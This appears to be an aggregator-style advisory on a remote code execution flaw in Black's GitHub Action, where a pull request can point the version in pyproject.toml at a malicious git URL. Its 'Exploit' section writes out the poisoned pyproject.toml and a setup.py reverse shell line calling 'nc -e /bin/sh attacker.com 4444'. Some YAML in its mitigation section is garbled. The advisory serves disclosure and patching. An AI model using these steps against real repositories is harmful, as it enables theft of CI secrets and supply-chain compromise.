Listen to this Post
The vulnerability in Black’s GitHub Action arises from its support for the `use_pyproject: true` option, which reads the Black version from the `pyproject.toml` file in a repository. When this option is enabled, the action parses the `version` field under `[tool.black]` to determine which Black version to install and use for formatting. An attacker can submit a malicious pull request that modifies the `pyproject.toml` file, replacing the version value with a direct URL reference to a malicious repository (e.g., git+https://malicious.com/black.git`). During the action's execution, it fetches and installs Black from this URL, leading to arbitrary code execution within the GitHub Action runner. This allows the attacker to access secrets, environment variables, and permissions available to the action, potentially compromising the entire workflow. The issue affects all versions before 26.3.0, where input validation was tightened to block non-version strings.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Black GitHub Action
Version: before 26.3.0
Vulnerability: RCE from version parsing
Severity: High
date: 6 Mar 2026
<h2 style="color: blue;">Prediction: Patched 7 Mar 2026</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
Check Black version in current GitHub Action environment black --version Simulate vulnerable workflow in local test git clone https://github.com/psf/black cd black echo -e "[tool.black]\nversion = \"git+https://github.com/attacker/malicious-black.git\"" > pyproject.toml Run action locally (requires act tool) act -j test-job --secret GITHUB_TOKEN=test Monitor GitHub Action logs for suspicious installations grep -i "pip install.git+" /path/to/action.log
<h2 style="color: blue;">Exploit:</h2>
Malicious pyproject.toml in pull request [tool.black] version = "git+https://github.com/attacker/malicious-black.git@main"
Attacker's malicious repository setup
git clone https://github.com/attacker/malicious-black
cd malicious-black
Inject reverse shell in setup.py
echo 'import os; os.system("nc -e /bin/sh attacker.com 4444")' >> setup.py
git add setup.py
git commit -m "Add backdoor"
git push origin main
<h2 style="color: blue;">Protection from this CVE:</h2>
Secure GitHub Action workflow (use_pyproject disabled) name: Format with Black on: [bash] jobs: format: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: psf/black@stable with: use_pyproject: false version: "26.3.0"
Upgrade to patched version via CLI pip install black==26.3.0 Verify update black --version | grep "26.3.0"
<h2 style="color: blue;">Impact:</h2>
- Arbitrary code execution in GitHub Action runners.
- Exposure of secrets (e.g.,GITHUB_TOKEN`, API keys) and permissions.
– Compromise of CI/CD pipelines, leading to supply chain attacks.
– Unauthorized access to repository data and downstream systems.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

